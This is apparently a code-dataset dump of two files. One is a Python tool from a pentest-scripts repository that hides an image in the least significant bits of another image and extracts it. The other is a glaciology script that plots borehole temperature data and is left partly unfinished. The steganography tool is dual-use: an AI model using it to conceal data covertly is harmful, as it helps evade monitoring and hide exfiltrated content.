] | null | null | null | pentest-scripts/python-web-penetration-testing-cookbook/Chapter_06_Code/StegoFull.py | paulveillard/cybersecurity-penetration-testing | a5afff13ec25afd0cf16ef966d35bddb91518af4 | [
"Apache-2.0"
] | 1 | 2022-01-15T23:57:36.000Z | 2022-01-15T23:57:36.000Z | #!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The filename of the image that will be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the hidden image will be extracted to.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden image from carrier and save to output filename.")
(options, args) = parser.parse_args()
if options.extract == True:
if options.carrier is None or options.output is None:
parser.error("a carrier filename -c and output file -o are required for extraction")
else:
ExtractMessage(options.carrier, options.output)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
HideMessage(options.carrier, options.message, options.output)
| 34.481481 | 116 | 0.56749 | #!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
def HideMessage(carrier, message, outfile):
cImage = Image.open(carrier)
hide = Image.open(message)
hide = hide.resize(cImage.size)
hide = hide.convert('1')
out = Image.new(cImage.mode, cImage.size)
width, height = cImage.size
newArray = []
for h in range(height):
for w in range(width):
ip = cImage.getpixel((w,h))
hp = hide.getpixel((w,h))
if hp == 0: # Force 0 And with 254
newred = ip[0] & 254
else: # Force 1 Or with 1
newred = ip[0] | 1
newArray.append((newred, ip[1], ip[2]))
out.putdata(newArray)
out.save(outfile)
print "Steg image saved to " + outfile
def ExtractMessage(carrier, outfile):
cImage = Image.open(carrier)
out = Image.new('L', cImage.size)
width, height = cImage.size
newArray = []
for h in range(height):
for w in range(width):
ip = cImage.getpixel((w,h))
if ip[0] & 1 == 0:
newArray.append(0)
else:
newArray.append(255)
out.putdata(newArray)
out.save(outfile)
print "Message extracted and saved to " + outfile
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The filename of the image that will be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the hidden image will be extracted to.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden image from carrier and save to output filename.")
(options, args) = parser.parse_args()
if options.extract == True:
if options.carrier is None or options.output is None:
parser.error("a carrier filename -c and output file -o are required for extraction")
else:
ExtractMessage(options.carrier, options.output)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
HideMessage(options.carrier, options.message, options.output)
| 1,208 | 0 | 54 |
0785aa7f6956416f134ea789ff4aa671f3f99fe2 | 22,017 | py | Python | 3_plotting.py | laworbit/Law_et_alDTS | 3f11a53a1bb9147815cc39d4e8fb95bebd53aa6b | [
"MIT"
] | null | null | null | 3_plotting.py | laworbit/Law_et_alDTS | 3f11a53a1bb9147815cc39d4e8fb95bebd53aa6b | [
"MIT"
] | null | null | null | 3_plotting.py | laworbit/Law_et_alDTS | 3f11a53a1bb9147815cc39d4e8fb95bebd53aa6b | [
"MIT"
] | null | null | null | #script to plot results from 1_full_process.py
#science advances figure guidelines. Preferably 2.5, 5.0, or 7.3 inches wide
#and no more than 11.0 inches high. Miminum line width of 0.5 pt. 9 pt and
#bold for e.g. A, B, C, etc.
#Robert Law, Scott Polar Research Institute, University of Cambridge, 2020. rl491@cam.ac.uk
import os
import sys
import glob
import scipy
import pylab
import seaborn
import datetime
import matplotlib
import numpy as np
import xarray as xr
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.patches as patch
import matplotlib.ticker as mticker
from matplotlib.ticker import MultipleLocator
Polynomial = np.polynomial.Polynomial

# run from the script's own directory so the relative data paths below resolve.
# abspath() guards against os.chdir('') (FileNotFoundError) when the script is
# launched from its own directory and dirname(sys.argv[0]) is empty.
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))
from T0_curve_fitting import fit_model, plot_model
#------------------------------- inputs -------------------------------------#
#paths to the processed DTS data produced by 1_full_process.py
file_path_end = 'processed_data/ch1_end_processed.nc'
file_path_full = 'processed_data/ch1_full_processed.nc'
plot_date = datetime.datetime(2019, 8, 14, 0, 0, 0) #date for plotting in datetime format
av_date = datetime.datetime(2019, 8, 10, 0, 0, 0) #date for averaging where in use. Takes average from av_date to plot_date
bh_depth = 1042.95 #(m) borehole depth, from Sam Doyle BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth as reported by DTS, inflated by refractive index error
z_start = 204. #(m) cable distance where the cable first enters the ice (in non-corrected distance)
fs = 8 #(pt) figure font size
close_up_depth = 970 #(m) depth at which the basal close-up panels begin
CTZ_lower = 982 #(m) interpreted depth of the bottom of the CTZ (cold-temperate transition zone)
max_T = 1 #(deg C) maximum temperature for image plot
min_T = -22 #(deg C) minimum temperature for image plot
pmp_allow = 0.0 #(K) tolerance below the calculated pmp within which ice is counted as temperate. TODO: 0.075 for the figure, but a lower value works better for analysis
equib_cut = 35 #(ind) depth cut to remove top section where cooling is not clearly exponential
fail_depth = (1109.5 - z_start)*(bh_depth/bh_depth_dts) #(m) depth-corrected point at which the cable failed
#curve-fit input params. This is a bit of an art; check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #offset from the max gradient: e.g. 1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#physical constants (fixed)
T0 = 273.15 #(K) 0 degrees C in Kelvin
Ttr = 273.16 #(K) triple point temperature of water
ptr = 611.73 #(Pa) triple point pressure of water
g = 9.81 #(m/s^2) gravitational acceleration
Bs = 1.86 #(K kg mol^-1) constant for pmp calculations from Cuffey and Paterson following Lliboutry (1976)
#parameters (site/analysis dependent, could change)
ccc = 9.14e-8 #(K/Pa) Clausius-Clapeyron constant
ccc2 = 9.14e-8 #(K/Pa) variant for water and solute load analysis. This value keeps the pmp line away from the observed at all points
slope = 0.96 #(degrees) bed slope under borehole
rho_ice = 910. #(kg/m^3) ice density
#load the processed DTS datasets
ds_end = xr.open_dataset(file_path_end)
ds_full = xr.open_dataset(file_path_full)
#ds_end.tmpw.isel(t = -1).plot(linewidth = 0.7)
#plt.show()
# NOTE(review): removed leftover debugging (print(ds_end); print(ds_full);
# sys.exit()) that terminated the script here before any figure was produced.

#correct depth: shift so z = 0 at the ice surface, then rescale to remove the
#refractive-index depth error (DTS reported bh_depth_dts for a bh_depth borehole)
ds_end.z.values = (ds_end.z.values - z_start)*(bh_depth/bh_depth_dts)
ds_full.z.values = (ds_full.z.values - z_start)*(bh_depth/bh_depth_dts)
#extract useful part
#ds_end = ds_end.isel(t = -1)
#load analog thermistor data from Sam Doyle (columns T1-T5 plus a datetime column)
Doyle_df = pd.read_csv('Doyle_data/analog_blue.csv')
Doyle_dt_val = Doyle_df.loc[:,'datetime'].values #datetime strings
Doyle_dt_list = list(Doyle_dt_val) #datetime list
Doyle_dts = [datetime.datetime.strptime(x, r'%d/%m/%Y %H:%M') for x in Doyle_dt_list] #parse to datetime objects
Doyle_dt_np = np.array(Doyle_dts) #into np array for vectorised comparison
#row indices of the first record after plot_date / av_date
ind_date_Doyle = np.argmax(Doyle_dt_np > plot_date)
av_ind_date_Doyle = np.argmax(Doyle_dt_np > av_date)
#instantaneous thermistor temperatures T1-T5 at plot_date
T1 = Doyle_df.loc[ind_date_Doyle,"T1"]
T2 = Doyle_df.loc[ind_date_Doyle,"T2"]
T3 = Doyle_df.loc[ind_date_Doyle,"T3"]
T4 = Doyle_df.loc[ind_date_Doyle,"T4"]
T5 = Doyle_df.loc[ind_date_Doyle,"T5"]
T_doyle = np.array([T1, T2, T3, T4, T5])
#mean thermistor temperatures over the av_date to plot_date window
av_T1 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
av_T2 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
av_T3 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
av_T4 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
av_T5 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
av_T_doyle = np.array([av_T1, av_T2, av_T3, av_T4, av_T5])
#standard deviations over the same averaging window
std_T1 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
std_T2 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
std_T3 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
std_T4 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
std_T5 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
std_T_doyle = np.array([std_T1, std_T2, std_T3, std_T4, std_T5])
#manually input thermistor positions for T1:T5 - presumably heights above the
#borehole bottom (m), converted to depth below surface; verify against field notes
T_depths = np.array([0.28, 1, 3, 5.04, 10.05])
T_depths = bh_depth - T_depths
#scatter coordinates for overplotting the thermistors on the DTS profile
x_scat = T_doyle
y_scat = T_depths
#Clausius-Clapeyron calculation of the pressure melting point (pmp) profile
# NOTE(review): the slice bounds still add z_start even though ds_full.z has
# already been shifted by z_start above - confirm this selects the intended
# depth range
p_ice = rho_ice*g*ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start))*np.cos(np.deg2rad(slope)) #ice overburden pressure (Pa), slope-corrected
T_pmp_cc = Ttr - ccc*(p_ice - ptr) #(K) pmp profile
T_pmp_cc_w_sol = Ttr - ccc2*(p_ice - ptr) #(K) pmp profile for water and solute load analysis
#index of the first sample deeper than the borehole bottom
depth_ind = np.argmax(ds_end.z.values > bh_depth)
#start_ind = np.argmax(ds_end.z.values > z_start) - 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 1. Time series image plot with close ups for solute load and water content
#image plot
y = ds_full.z.values
# NOTE(review): slice bounds add z_start although ds_full.z was already shifted
# by z_start above - confirm this selects the intended depth range
T = ds_full.tmpw.sel(z = slice(0+z_start, bh_depth+z_start)).values #(depth, time)
close_up_ind = np.argmax(y > close_up_depth) #first index below the close-up depth
temp_min = -0.85 #(deg C) colour limits for the temperate-zone close up
temp_max = -0.75

#create image of the pressure melting point: broadcast the 1-D pmp profiles
#across every time column (replaces a per-column assignment loop; the dead
#pre-allocation of pmp_ind, immediately overwritten below, was also removed)
pmp_cut = T_pmp_cc
pmp_cut_w_sol = T_pmp_cc_w_sol
pmp_im = np.broadcast_to(np.asarray(pmp_cut)[:, None], np.shape(T)).copy()
pmp_im_w_sol = np.broadcast_to(np.asarray(pmp_cut_w_sol)[:, None], np.shape(T)).copy()
pmp_im_w_sol = pmp_im_w_sol - T0 #w_sol means for water and solute analysis; to deg C
pmp_im = pmp_im - pmp_allow - T0 #pmp less tolerance, to deg C

#find where the pmp (less the pmp_allow tolerance) is exceeded, i.e. temperate ice
pmp_dif = T - pmp_im
pmp_dif_w_sol = pmp_im_w_sol - T
pmp_ind = np.greater(pmp_dif, np.zeros(np.shape(T)))
matplotlib.rcParams.update({'font.size': fs}) #global font size
x_lims = mdates.date2num(ds_full.t.values) #time axis limits as matplotlib date numbers
#figure 1 layout: 10x20 gridspec, 7.3 in wide (Science Advances full width)
fig1 = plt.figure(figsize = (7.3,130/25.4), constrained_layout=True)
gs = fig1.add_gridspec(10,20)
ax1a = fig1.add_subplot(gs[:6,:-1]) #main image
ax1b = fig1.add_subplot(gs[:6,-1]) #T colorbar
ax1c = fig1.add_subplot(gs[6:8,:-1]) #close up temperate zone T
ax1d = fig1.add_subplot(gs[6:8,-1]) #T colorbar for close up
ax1e = fig1.add_subplot(gs[8:10,:-1]) #water content
ax1f = fig1.add_subplot(gs[8:10,-1]) #water content colourbar
#main image: full-depth temperature through time
ax1a.imshow(T, vmin=min_T, vmax=max_T, aspect='auto', cmap='viridis',
            extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#red dashed line marks the top of the basal close-up panels below
ax1a.hlines(close_up_depth, x_lims[0], x_lims[-1], colors = 'r', lw=0.75, linestyles='dashed')
#print(T)
#ax1a.contour(T, levels = [-25, -20, -15, -10, -5, 0])
#ax1a.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'white', lw=0.8, linestyles='dashed')
#ax1a.contour( pmp_ind, levels=[0], colors='white', linewidths=0.75, aspect='auto',
#             extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#white isotherms every 5 deg C; NOTE(review): the y extent here is flipped
#relative to the imshow extent above - presumably to match contour's origin
#convention; verify visually
ax1a_contours = ax1a.contour( T, levels=[-25, -20, -15, -10, -5, 0], colors='white', linewidths=0.75, aspect='auto',
              extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#ax1a.clabel(ax1a_contours, fontsize = fs)
#ax1a.set_ylim([bh_depth, 0])
#ax1a.xaxis.set_tick_params(rotation=30)
#date axis: 'Aug 14'-style major labels, daily minor ticks, labels hidden
#(date labels are carried by the bottom panel)
ax1a.xaxis_date()
ax1a.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1a.set_ylabel(' ', fontsize= fs)
days = mdates.DayLocator()
ax1a.xaxis.set_minor_locator(days)
ax1a.set_xticklabels([])
#hand-built colourbar for the main panel: a 1000x2 vertical ramp image running
#from max_T down to min_T, drawn into its own narrow axis (ax1b)
ramp1 = np.linspace(max_T, min_T, 1000)
cbar_plot1 = np.column_stack((ramp1, ramp1))
im2 = ax1b.imshow(cbar_plot1, aspect='auto', cmap='viridis',
                  extent=[0, 1, min_T, max_T])
#ticks on the right-hand side only, with minor ticks every 1 deg C
ax1b.set_xticks([])
ax1b.set_yticks(np.arange(min_T, max_T, 1), minor=True)
ax1b.yaxis.set_label_position("right")
ax1b.yaxis.tick_right()
ax1b.tick_params(axis='y', which='minor')
#ax1b.set_ylabel('Temperature ($^\circ$ C)')
#temperate-zone close up: same temperature field with tight colour limits
ax1c.imshow(T, vmin=temp_min, vmax=temp_max, aspect='auto', cmap='viridis',
            extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1c.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
#            extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#black dashed line at the interpreted bottom of the CTZ
ax1c.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1c.set_ylim([bh_depth, close_up_depth]) #restrict to the basal section
#ax1a.xaxis.set_tick_params(rotation=30)
ax1c.xaxis_date()
ax1c.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
days = mdates.DayLocator()
ax1c.xaxis.set_minor_locator(days)
ax1c.set_xticklabels([]) #date labels are carried by the bottom panel
#hand-built colourbar for the close-up panel: a vertical ramp image from
#temp_max down to temp_min, drawn into its own narrow axis (ax1d)
ramp2 = np.linspace(temp_max, temp_min, 1000)
cbar_plot2 = np.column_stack((ramp2, ramp2))
im3 = ax1d.imshow(cbar_plot2, aspect='auto', cmap='viridis',
                  extent=[0, 1, temp_min, temp_max])
#ticks on the right-hand side only, with minor ticks every 0.025 deg C
ax1d.set_xticks([])
ax1d.set_yticks(np.arange(temp_min, temp_max, 0.025), minor=True)
ax1d.yaxis.set_label_position("right")
ax1d.yaxis.tick_right()
ax1d.tick_params(axis='y', which='minor')
#ax1d.set_ylabel(' ', fontsize= fs)
#^^^^^^^^^^^^^^^^^^^^^^^^^^
#temperature deviation (n): observed temperature relative to the solute-load pmp
n_min = -0.03 #minimum deviation for plotting
n_max = 0.03 #maximum deviation for plotting
n = pmp_dif_w_sol
ax1e.imshow(n, vmin=n_min, vmax=n_max, aspect='auto', cmap='viridis',
            extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1e.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
#            extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#black dashed line at the interpreted bottom of the CTZ
ax1e.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1e.set_ylim([bh_depth, close_up_depth]) #restrict to the basal section
#ax11a.xaxis.set_tick_params(rotation=30)
ax1e.xaxis_date()
ax1e.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1e.set_xlabel('Date (2019)', fontsize= fs) #only this bottom panel carries date labels
days = mdates.DayLocator()
ax1e.xaxis.set_minor_locator(days)
#create salt concentration colorbar as seperate plot
cbar_plot4 = np.zeros((1000, 2))
cbar_plot4[:,0] = np.linspace(n_max, n_min, 1000)
cbar_plot4[:,1] = np.linspace(n_max, n_min, 1000)
im3 = ax1f.imshow(cbar_plot4, aspect='auto', cmap='viridis',
extent = [0, 1, n_min, n_max])
ax1f.set_xticks([])
#ax1f.set_yticks(np.arange(n_min, n_max, 1), minor=True)
ax1f.yaxis.set_label_position("right")
ax1f.yaxis.tick_right()
ax1f.tick_params(axis='y', which='minor')
f = mticker.ScalarFormatter(useOffset=False, useMathText=True)
#format = lambda x,pos : "${}$".format(f._formatSciNotation('%1.10e' % x))
#ax1f.yaxis.set_major_formatter(mticker.FuncFormatter(format))
#ax1f.set_ylabel('Salt concentration (mol/kg)', fontsize= fs)
ax1f.set_ylabel('\n ')
#^^^^^^^^^^^^^^^^^^^^
#text labels
fig1.text(0.01, 0.5, 'Depth (m)', va='center', rotation='vertical', fontsize = fs)
fig1.text(0.96, 0.40, 'Temperature ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1 = fig1.text(0.96, 0.135, 'Temperature\ndeviation ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1.set_multialignment('center')
#text2 = fig1.text(0.96, 0.15, 'Solute\nconcentration', va='center', rotation='vertical', fontsize = fs)
#text2.set_multialignment('center')
#fig1.savefig('figures/T_series.png', dpi=600, bbox_inches = 'tight', pad_inches = 0)
plt.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 5. 3 part profile plot (full, gradient, temperate zone close up) with rectangle cut outs
#EQUILIBRIUM ANALYSIS: FULL LOOP
#get time in seconds
#get time in seconds
t = ds_full.t.values
#datetime64[ns] differences -> seconds (hence the 1e-9 factor)
xdata = [float((t[i] - t[0])*(1e-9)) for i in range(len(t))]
xdata = np.array(xdata)
xdata = xdata - xdata[0] + 1 #add a second on to prevent 0 value (func has a pole at x == s)
T_equib = T
#output arrays: extrapolated equilibrium temperature and fit RMSE per depth,
#NaN-initialised so depths outside the fitted range stay blank when plotted
ice_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
ice_T_0[:] = np.nan
RMSE_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
RMSE_T_0[:] = np.nan
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#for loop for each depth
#for i in range(T_equib.shape[0]):
print('Running equilibrium loop..')
#y_equib = ds_full.z.isel(z = slice(equib_cut, 3766))
#Fit the line-source cooling model func() to the post-drilling temperature
#decay at each depth and extrapolate the equilibrium ice temperature T_0.
#NOTE(review): the stop index 8300 is hard-coded — presumably T.shape[0];
#confirm it matches the dataset before reuse.
for i in range(equib_cut, 8300):
    #temperature time series at this depth
    ydata = T_equib[i,:]
    #time-gradient of the decay curve
    ydata_grad = np.gradient(ydata)
    #index of steepest cooling (most negative gradient) within the hunt window
    grad_max = np.argmin(ydata_grad[equib_start:equib_end])
    #index from which to begin the fit (grad_max is relative to equib_start,
    #then shifted by grad_max_pos samples)
    exp_ind = grad_max + grad_max_pos - equib_start
    #x and y data actually passed to the fit
    xdata_loop = xdata[exp_ind:]
    ydata_loop = ydata[exp_ind:]
    #fit T(t) = Q/(4*pi*k_i*(t - s)) + T_0
    popt, pcov = scipy.optimize.curve_fit(func, xdata_loop, ydata_loop, p0=(0,0,0))
    #record extrapolated equilibrium temperature
    ice_T_0[i] = popt[2]
    #RMSE of the fit residuals, used later as an uncertainty band
    Q = popt[0]
    s = popt[1]
    residuals = (ydata_loop - func(xdata_loop, Q, s, ice_T_0[i]))
    RMSE_T_0[i] = np.sqrt(np.mean(residuals**2))
#plot values
y = ds_end.z.values
y_equib = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values
co_T1 = -17.9
co_T2 = -17.0
co_d1 = 200
co_d2 = 240
a = 0.5
#Clausius-Clapeyron calculation (seperate to figure 1 as easier to keep coords seperate)
p_ice = rho_ice*g*y*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
fig5, (ax5a, ax5b, ax5c) = plt.subplots(1,3)
fig5.set_size_inches(7.3,140/25.4)
fig5.subplots_adjust(wspace = 0.23)
T_mean_grad = np.gradient(ds_end.tmpw, ds_end.z)
ax5b.scatter(-0.0815, 105, color='orange')
ax5b.plot(T_mean_grad, y, lw = 0.25, label = 'Temperature gradient', color='k')
ax5b.invert_yaxis()
ax5b.set_xlim([-0.3, 0.3])
ax5b.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5b.set_xlabel("Temperature gradient ($^\circ$C m$^-1$)")
ax5b.locator_params(axis='x', nbins=6)
ax5b.grid(True)
ax5b.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#ax5b.set_yticklabels([])
ax5a.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=0.8, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5a.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5a.scatter(x_scat, y_scat, s=20, facecolors='none', edgecolors='black', zorder=6, label='Thermistor data')
ax5a.invert_yaxis()
ax5a.set_xlim([-25, 2])
ax5a.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5a.set_xlabel("Temperature ($^\circ$C)")
ax5a.set_ylabel("Depth (m)")
ax5a.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5a.grid(True)
rect1 = patch.Rectangle((co_T1, co_d2), co_T2 - co_T1, co_d1 - co_d2, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect1)
rect2 = patch.Rectangle((-6, 880), 6.5, bh_depth - 880, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect2)
ax5c.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5c.plot(ds_end.tmpw, y, lw=1, label='Temperature', zorder=3, color='k')
ax5c.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5c.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5c.invert_yaxis()
ax5c.set_xlim([-6, -0.5]) #orig = [-25, 2], temp zone = [-1.5, -0.5]quit()
ax5c.set_ylim([bh_depth, 880]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5c.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5c.set_xlabel("Temperature ($^\circ$C)")
ax5c.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5c.grid(True)
#rect3 = patch.Rectangle((-0.95, bh_depth - 85), 0.3, bh_depth - 85, linewidth=1, facecolor='none', edgecolor = 'k')
#ax5c.add_patch(rect3)
#cut out
xspacing = 0.1
yspacing = 5
minorlocatorx = MultipleLocator(xspacing)
majorlocatory = MultipleLocator(yspacing)
ax5d = fig5.add_axes([0.225, 0.46, 0.1, 0.21])
ax5d.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=a, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5d.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5d.invert_yaxis()
ax5d.set_xlim([co_T1, co_T2])
ax5d.set_ylim([co_d2,co_d1]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5d.xaxis.set_minor_locator(minorlocatorx)
#ax5d.yaxis.set_minor_locator(majorlocatory)
ax5d.grid(which='major')
ax5d.grid(which='minor')
ax5e = fig5.add_axes([0.73, 0.15, 0.1, 0.43])
ax5e.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5e.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5e.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5e.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5e.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5e.invert_yaxis()
ax5e.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5e.set_xlim([-0.95, -0.65])
ax5e.set_ylim([bh_depth, bh_depth - 85]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5e.xaxis.set_minor_locator(minorlocatorx)
ax5e.yaxis.set_minor_locator(majorlocatory)
ax5e.grid(which='major')
ax5e.grid(which='minor')
#fig5.savefig('figures/T_profile_mean4.png', dpi=600, bbox_inches = 'tight', format = 'png')
plt.show()
#plt.close('all')
#save outdatacd
data_out = np.column_stack((y, ds_end.tmpw))
#np.savetxt('results/T_profile.txt', data_out)
#clausius clapeyron calculation for each time step
sys.exit()
y_2 = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values #introducing second y cut to region of interest
#for loop to run over area within temperate zone and calculate clausius clapeyron slope and goodness of fit
#create output array
rms_out = np.zeros(len(t)) #store root mean square error
r2_out = np.zeros(len(t)) #r squared value
cc_out = np.zeros(len(t)) #store Clausius Clapeyron
#get index where passes inferred CTZ
#index of the first depth sample below the inferred CTZ top (982 m)
t_zone_top = [ n for n,i in enumerate(y_2) if i>982 ][0]
#For every time step, fit a straight line T(z) through the temperate zone and
#record its slope (the apparent Clausius-Clapeyron gradient), RMS misfit and R^2.
for i in range(len(t)):
    #prepare regression inputs
    #t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
    #print(t_zone_top)
    T_full = np.squeeze(T[:,i])
    t_zone_ind = np.squeeze(pmp_ind[:,i]) #NOTE(review): unused in this loop
    T_t_zone = T_full[t_zone_top:]
    y_t_zone = y_2[t_zone_top:]
    #perform regression
    #m = slope, A0 = intercept
    ymin, ymax = min(y_t_zone), max(y_t_zone)
    pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
        domain=(ymin, ymax))
    #print('Raw fit results:', pfit, stats, sep='\n')
    A0, m = pfit
    resid, rank, sing_val, rcond = stats
    rms = np.sqrt(resid[0]/len(y_t_zone))
    #separate linregress call just to obtain R^2
    #NOTE(review): this rebinds the module-level name 'slope' (borehole slope,
    #0.96 deg) — harmless here since p_ice was computed earlier, but fragile.
    slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_t_zone, T_t_zone)
    #print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
    #      '(rms residual = {:.4f})'.format(rms))
    #pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
    #pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
    #pylab.xlabel('Temperature $^{o}C$')
    #pylab.ylabel('Depth (m)')
    #plt.gca().invert_yaxis()
    #pylab.show()
    #save outputs
    rms_out[i] = rms
    r2_out[i] = r_value**2
    cc_out[i] = m #slope stored in K m-1; conversion to K MPa-1 happens only at plot time
plt.plot(t, -0.8 - 1043*cc_out)
plt.show()
plt.plot(t, (-cc_out/(rho_ice*g))*1e6)
#plt.plot(t, (rms_out/(rho_ice*g))*1e6)
plt.show()
plt.plot(t, r2_out)
plt.show()
#seperate plots
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
#Repeat the temperate-zone regression for a single time step (index 120) and
#show the fit as scatter (data) plus line (fit).
T_full = np.squeeze(T[:,120])
t_zone_ind = np.squeeze(pmp_ind[:,120]) #NOTE(review): unused
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
